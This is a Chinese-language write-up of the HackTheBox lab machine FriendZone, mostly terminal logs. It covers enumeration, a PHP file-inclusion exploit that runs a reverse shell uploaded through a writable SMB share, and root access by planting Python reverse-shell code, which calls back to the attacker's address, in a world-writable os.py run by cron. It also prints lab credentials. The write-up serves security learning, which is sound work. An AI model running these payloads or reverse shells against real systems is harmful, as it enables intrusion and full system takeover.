title: HackTheBox-FriendZone author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/FriendZone.png tags:

•LInux

Recon:

Crazy:~/HackThebox/FriendZone$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.123[sudo] crazyinside 的密码：Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-21 23:09:34 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 22/tcp on 10.10.10.123                                    Discovered open port 445/tcp on 10.10.10.123                                   Discovered open port 53/udp on 10.10.10.123                                    Discovered open port 53/tcp on 10.10.10.123                                    Discovered open port 80/tcp on 10.10.10.123                                    Discovered open port 21/tcp on 10.10.10.123                                    Discovered open port 137/udp on 10.10.10.123                                   Discovered open port 139/tcp on 10.10.10.123                                   Discovered open port 443/tcp on 10.10.10.123     Crazy:~/HackThebox/FriendZone$ sudo nmap -sC -sV 10.10.10.123 -p22,445,53,80,21,137,139,443 -oN FriendZoneportStarting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 07:13 CSTNmap scan report for 10.10.10.123Host is up (0.11s latency).
PORT    STATE  SERVICE     VERSION21/tcp  open   ftp         vsftpd 3.0.322/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)53/tcp  open   domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)| dns-nsid: |_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu80/tcp  open   http        Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Friend Zone Escape software137/tcp closed netbios-ns139/tcp open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)443/tcp open   ssl/http    Apache httpd 2.4.29|_http-server-header: Apache/2.4.29 (Ubuntu)| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO| Not valid before: 2018-10-05T21:02:30|_Not valid after:  2018-11-04T21:02:30| tls-alpn: |_  http/1.1|_ssl-date: TLS randomness does not represent time|_http-title: 404 Not Found445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:| smb2-time: |   date: 2022-08-21T23:13:49|_  start_date: N/A| smb-security-mode: |   account_used: guest|   authentication_level: user|   challenge_response: supported|_  message_signing: disabled (dangerous, but default)| smb2-security-mode: |   311: |_    Message signing enabled but not required|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: -1s|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: , NetBIOS MAC: 000000000000 (Xerox)| smb-os-discovery: |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)|   Computer name: friendzone|   NetBIOS computer name: FRIENDZONE\x00|   Domain name: \x00|   FQDN: friendzone|_  System time: 2022-08-22T02:13:49+03:00
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 25.74 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.123 -p22,445,53,80,21,137,139,443 -oN

80页面只有一张图片和几句话。

Crazy:~/HackThebox/FriendZone$ curl -I 10.10.10.123                          HTTP/1.1 200 OKDate: Sun, 21 Aug 2022 23:15:19 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 05 Oct 2018 22:52:00 GMTETag: "144-577831e9005e6"Accept-Ranges: bytesContent-Length: 324Vary: Accept-EncodingContent-Type: text/html
                                                                                                                                       Crazy:~/HackThebox/FriendZone$ sudo vim /etc/hosts               [sudo] crazyinside 的密码：                                                                                                                                       Crazy:~/HackThebox/FriendZone$ dirsearch -u http://friendzoned.htb           
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/friendzoned.htb/_22-08-22_07-16-52.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_07-16-52.log
Target: http://friendzoned.htb/
[07:16:52] Starting: [07:17:00] 403 -  304B  - /.htaccess.bak1[07:17:00] 403 -  304B  - /.htaccess.orig[07:17:00] 403 -  306B  - /.htaccess.sample[07:17:00] 403 -  302B  - /.htaccessOLD[07:17:00] 403 -  304B  - /.htaccess.save[07:17:00] 403 -  303B  - /.htaccessOLD2[07:17:00] 403 -  304B  - /.htaccess_orig[07:17:00] 403 -  302B  - /.htaccessBAK[07:17:00] 403 -  305B  - /.htaccess_extra[07:17:00] 403 -  301B  - /.ht_wsr.txt[07:17:00] 403 -  302B  - /.htaccess_sc[07:17:00] 403 -  304B  - /.htpasswd_test[07:17:00] 403 -  300B  - /.htpasswds[07:17:00] 403 -  301B  - /.httr-oauth[07:17:00] 403 -  294B  - /.htm[07:17:00] 403 -  295B  - /.html[07:17:02] 403 -  294B  - /.php[07:17:50] 200 -  324B  - /index.html[07:17:50] 200 -   11KB - /index.bak[07:18:09] 200 -   13B  - /robots.txt[07:18:10] 403 -  304B  - /server-status/[07:18:10] 403 -  303B  - /server-status[07:18:22] 200 -  750B  - /wordpress/
Task Completed                                                                                                                                       Crazy:~/HackThebox/FriendZone$

80端口还是有些地方需要注意的，wordpress是一个空目录：

Crazy:~/HackThebox/FriendZone$ curl http://friendzoned.htb/robots.txt        seriously ?!Crazy:~/HackThebox/FriendZone$ file index.bak         index.bak: HTML document, ASCII text

或许没有。

Crazy:~/HackThebox/FriendZone$ smbmap -H friendzoned.htb -u whoami[+] Guest session       IP: friendzoned.htb:445 Name: unknown                                                   Disk                                                    Permissions     Comment        ----                                                    -----------     -------        print$                                                  NO ACCESS       Printer Drivers        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files        general                                                 READ ONLY       FriendZone Samba Server Files        Development                                             READ, WRITE     FriendZone Samba Server Files        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))                                                                                             Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/Development -U "whoami"Password for [WORKGROUP\whoami]:Try "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Mon Aug 22 07:17:22 2022  ..                                  D        0  Thu Jan 24 05:51:02 2019
                9221460 blocks of size 1024. 6456928 blocks availablesmb: \> exit                                                                                                                                       Crazy:~/HackThebox/FriendZone$

SMB有一个能够被读取写入的目录，但是里边空空如也。另一个可读的目录里有一个证明：

Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/general -U "whoami"Password for [WORKGROUP\whoami]:Try "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Thu Jan 17 04:10:51 2019  ..                                  D        0  Thu Jan 24 05:51:02 2019  creds.txt                           N       57  Wed Oct 10 07:52:42 2018
                9221460 blocks of size 1024. 6457724 blocks availablesmb: \> get creds.txt getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> Crazy:~/HackThebox/FriendZone$ cat creds.txt      creds for the admin THING:
admin:WORKWORKHhallelujah@#

443页面是空的：

但是我在证书中看到了另一个域名，或许是我本地hosts记录错了也不一定：

看来是的：

Crazy:~/HackThebox/FriendZone$ curl -k -I https://friendzone.red/ HTTP/1.1 200 OKDate: Sun, 21 Aug 2022 23:39:04 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 05 Oct 2018 21:18:21 GMTETag: "ee-57781cf9aaa2d"Accept-Ranges: bytesContent-Length: 238Vary: Accept-EncodingContent-Type: text/html

页面源码注释里有些东西：

</span><span style="margin: 0px;-webkit-tap-highlight-color: transparent;color: rgb(51, 51, 51);">FriendZone escape software</span><span style="margin: 0px;-webkit-tap-highlight-color: transparent;color: navy;">




Ready to escape from friend zone !

 src="e.gif">

注释里还会有些提示：

暂时不知道它是什么：

Crazy:~/HackThebox/FriendZone$ echo "amwwNkdvQTZIbjE2NjExMjUyNTZOeER1REUyeDZR"|base64 -djl06GoA6Hn1661125256NxDuDE2x6Q                                                                                                                                       Crazy:~/HackThebox/FriendZone$ echo "amwwNkdvQTZIbjE2NjExMjUyNTZOeER1REUyeDZR"|base64 -d|base64 -d�]:▒�:}z�]v�nz7�

目录枚举到了admin:

Crazy:~/HackThebox/FriendZone$ dirsearch -u https://friendzone.red/          
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/friendzone.red/-_22-08-22_07-40-33.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_07-40-33.log
Target: https://friendzone.red/
[07:40:34] Starting: [07:40:39] 301 -  315B  - /js  ->  https://friendzone.red/js/[07:40:41] 403 -  301B  - /.ht_wsr.txt[07:40:41] 403 -  304B  - /.htaccess.orig[07:40:41] 403 -  304B  - /.htaccess.bak1[07:40:41] 403 -  302B  - /.htaccess_sc[07:40:41] 403 -  306B  - /.htaccess.sample[07:40:41] 403 -  304B  - /.htaccess_orig[07:40:41] 403 -  304B  - /.htaccess.save[07:40:41] 403 -  305B  - /.htaccess_extra[07:40:41] 403 -  304B  - /.htpasswd_test[07:40:41] 403 -  300B  - /.htpasswds[07:40:41] 403 -  301B  - /.httr-oauth[07:40:42] 403 -  302B  - /.htaccessBAK[07:40:42] 403 -  295B  - /.html[07:40:42] 403 -  302B  - /.htaccessOLD[07:40:42] 403 -  294B  - /.htm[07:40:42] 403 -  303B  - /.htaccessOLD2[07:40:44] 403 -  294B  - /.php[07:41:00] 301 -  318B  - /admin  ->  https://friendzone.red/admin/[07:41:00] 200 -  742B  - /admin/[07:41:00] 403 -  305B  - /admin/.htaccess[07:41:00] 200 -  742B  - /admin/?/login[07:41:30] 200 -  238B  - /index.html[07:41:32] 200 -  922B  - /js/[07:41:55] 403 -  303B  - /server-status[07:41:55] 403 -  304B  - /server-status/

但是跟wordpress一样是空的：

Crazy:~/HackThebox/FriendZone$ smbmap -H 10.10.10.123 -u admin -p 'WORKWORKHhallelujah@#'[+] Guest session       IP: 10.10.10.123:445    Name: friendzone.red                                            Disk                                                    Permissions     Comment        ----                                                    -----------     -------        print$                                                  NO ACCESS       Printer Drivers        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files        general                                                 READ ONLY       FriendZone Samba Server Files        Development                                             READ, WRITE     FriendZone Samba Server Files        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))                                                                                                                                       Crazy:~/HackThebox/FriendZone$

这账号似乎是错误的。

Crazy:~/HackThebox/FriendZone$ ftp 10.10.10.123                   Connected to 10.10.10.123.220 (vsFTPd 3.0.3)Name (10.10.10.123:crazyinside): admin331 Please specify the password.Password: 530 Login incorrect.ftp: Login failedftp> ls

ftp也是不行的。那就只剩DNS了：

Crazy:~/HackThebox/FriendZone$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.18.4-2-Debian <<>> axfr friendzone.red @10.10.10.123;; global options: +cmdfriendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800friendzone.red.         604800  IN      AAAA    ::1friendzone.red.         604800  IN      NS      localhost.friendzone.red.         604800  IN      A       127.0.0.1administrator1.friendzone.red. 604800 IN A      127.0.0.1hr.friendzone.red.      604800  IN      A       127.0.0.1uploads.friendzone.red. 604800  IN      A       127.0.0.1friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800;; Query time: 107 msec;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP);; WHEN: Mon Aug 22 07:51:17 CST 2022;; XFR size: 8 records (messages 1, bytes 289)

都是HTTPS端口，证书中没有发现其他东西。

有点文件包含的味道。

试了下第二个参数:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

它后端可能是 include "pagename" .php .源码确实是这样的：

Crazy:~/HackThebox/FriendZone$ echo "PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo="|base64 -dphp
//echo "Smart photo script for friendzone corp !";//echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";echo "FriendZone Admin !";$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){ echo "


";
echo "Smart photo script for friendzone corp !";echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";
if(!isset($_GET["image_id"])){  echo "

";  echo "image_name param is missed !";  echo "please enter it to show the image";  echo "default is image_id=a.jpg&pagename=timestamp"; }else{ $image = $_GET["image_id"]; echo "";
 echo "Something went worng ! , the script include wrong param !"; include($_GET["pagename"].".php"); //echo $_GET["pagename"]; }}else{echo "You can't see the content ! , please login !
";}?>

暂时没什么头绪，看了另一个上传页面。我猜它是upload.php:

Crazy:~/HackThebox/FriendZone$ curl -k https://uploads.friendzone.red/upload.php
WHAT ARE YOU TRYING TO DO HOOOOOOMAN !

Crazy:~/HackThebox/FriendZone$ echo "PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K"|base64 -dphp
// not finished yet -- friendzone admin !
if(isset($_POST["image"])){
echo "Uploaded successfully !
";echo time()+3600;}else{
echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";
}
?>

这个上传页面是个假的。其实回想一下，已经有文件包含了，它添加后缀.php让我只能包含php文件，但是SMB为了留了一个共享可写的目录，Nmap脚本可以枚举共享对应的目录信息：

Crazy:~/HackThebox/FriendZone$ nmap --script smb-enum-shares.nse -p445 10.10.10.123Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 08:30 CSTNmap scan report for friendzone.red (10.10.10.123)Host is up (0.15s latency).
PORT    STATE SERVICE445/tcp open  microsoft-ds
Host script results:| smb-enum-shares: |   account_used: guest|   \\10.10.10.123\Development: |     Type: STYPE_DISKTREE|     Comment: FriendZone Samba Server Files|     Users: 0|     Max Users: |     Path: C:\etc\Development|     Anonymous access: READ/WRITE|     Current user access: READ/WRITE|   \\10.10.10.123\Files: |     Type: STYPE_DISKTREE|     Comment: FriendZone Samba Server Files /etc/Files|     Users: 0|     Max Users: |     Path: C:\etc\hole|     Anonymous access: |     Current user access: |   \\10.10.10.123\IPC$: |     Type: STYPE_IPC_HIDDEN|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))|     Users: 1|     Max Users: |     Path: C:\tmp|     Anonymous access: READ/WRITE|     Current user access: READ/WRITE|   \\10.10.10.123\general: |     Type: STYPE_DISKTREE|     Comment: FriendZone Samba Server Files|     Users: 0|     Max Users: |     Path: C:\etc\general|     Anonymous access: READ/WRITE|     Current user access: READ/WRITE|   \\10.10.10.123\print$: |     Type: STYPE_DISKTREE|     Comment: Printer Drivers|     Users: 0|     Max Users: |     Path: C:\var\lib\samba\printers|     Anonymous access: |_    Current user access: 
Nmap done: 1 IP address (1 host up) scanned in 35.73 secondszsh: segmentation fault  nmap --script smb-enum-shares.nse -p445 10.10.10.123

Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/Development -U "whoami"Password for [WORKGROUP\whoami]:Try "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Mon Aug 22 08:36:45 2022  ..                                  D        0  Thu Jan 24 05:51:02 2019
                9221460 blocks of size 1024. 6450228 blocks availablesmb: \> put phpreverseshell.php putting file phpreverseshell.php as \phpreverseshell.php (8.5 kb/s) (average 8.5 kb/s)smb: \> exit

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpreverseshell

Crazy:~/HackThebox/FriendZone$ nc -lvnp 1337listening on [any] 1337 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.123] 37494Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 03:39:33 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ python3 -c 'import pty; pty.spawn("/bin/bash")'www-data@FriendZone:/$ lslsbin   home            lib64       opt   sbin      tmp      vmlinuz.oldboot  initrd.img      lost+found  proc  srv       usrdev   initrd.img.old  media       root  swapfile  varetc   lib             mnt         run   sys       vmlinuzwww-data@FriendZone:/$ cd homecd homewww-data@FriendZone:/home$ lslsfriendwww-data@FriendZone:/home$ cd friendcd friendwww-data@FriendZone:/home/friend$ lslsuser.txtwww-data@FriendZone:/home/friend$ cat user.txtcat user.txta9e..............................www-data@FriendZone:/home/friend$

www-data@FriendZone:/var/www$ lsadmin  friendzone  friendzoneportal  friendzoneportaladmin  html  mysql_data.conf  uploadswww-data@FriendZone:/var/www$ cat mysql_data.conf for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZwww-data@FriendZone:/var/www$

friend@FriendZone:/opt/server_admin$ lsreporter.pyfriend@FriendZone:/opt/server_admin$ cat reporter.py #!/usr/bin/python
import os
to_address = "admin1@friendzone.com"from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later# Sam ~ python developerfriend@FriendZone:/opt/server_admin$

python脚本导入了os库。而且存在一个定时任务，两分钟运行一次该脚本：

2019/02/12 15:18:01 CMD: UID=0    PID=26106  | /usr/bin/python /opt/server_admin/reporter.py 2019/02/12 15:18:01 CMD: UID=0    PID=26105  | /bin/sh -c /opt/server_admin/reporter.py 2019/02/12 15:18:01 CMD: UID=0    PID=26104  | /usr/sbin/CRON -f 2019/02/12 15:20:01 CMD: UID=0    PID=26109  | /usr/bin/python /opt/server_admin/reporter.py 2019/02/12 15:20:01 CMD: UID=0    PID=26108  | /bin/sh -c /opt/server_admin/reporter.py 2019/02/12 15:20:01 CMD: UID=0    PID=26107  | /usr/sbin/CRON -f

这个脚本我是没权限写入的，但是OS库似乎可以：

friend@FriendZone:/usr/lib/python2.7$ find -type f -writable -ls   262202     28 -rw-rw-r--   1 friend   friend      25583 Jan 15  2019 ./os.pyc   282643     28 -rwxrwxrwx   1 root     root        25910 Jan 15  2019 ./os.pyfriend@FriendZone:/usr/lib/python2.7$

rwx.

import ptyimport socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.10.16.3",1338))dup2(s.fileno(),0)dup2(s.fileno(),1)dup2(s.fileno(),2)pty.spawn("/bin/bash")s.close()

Crazy:~/HackThebox/FriendZone$ nc -lvnp 1338                                       listening on [any] 1338 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.123] 50348root@FriendZone:~# ididuid=0(root) gid=0(root) groups=0(root)root@FriendZone:~# cat /root/root.txtcat /root/root.txtb0..............................root@FriendZone:~#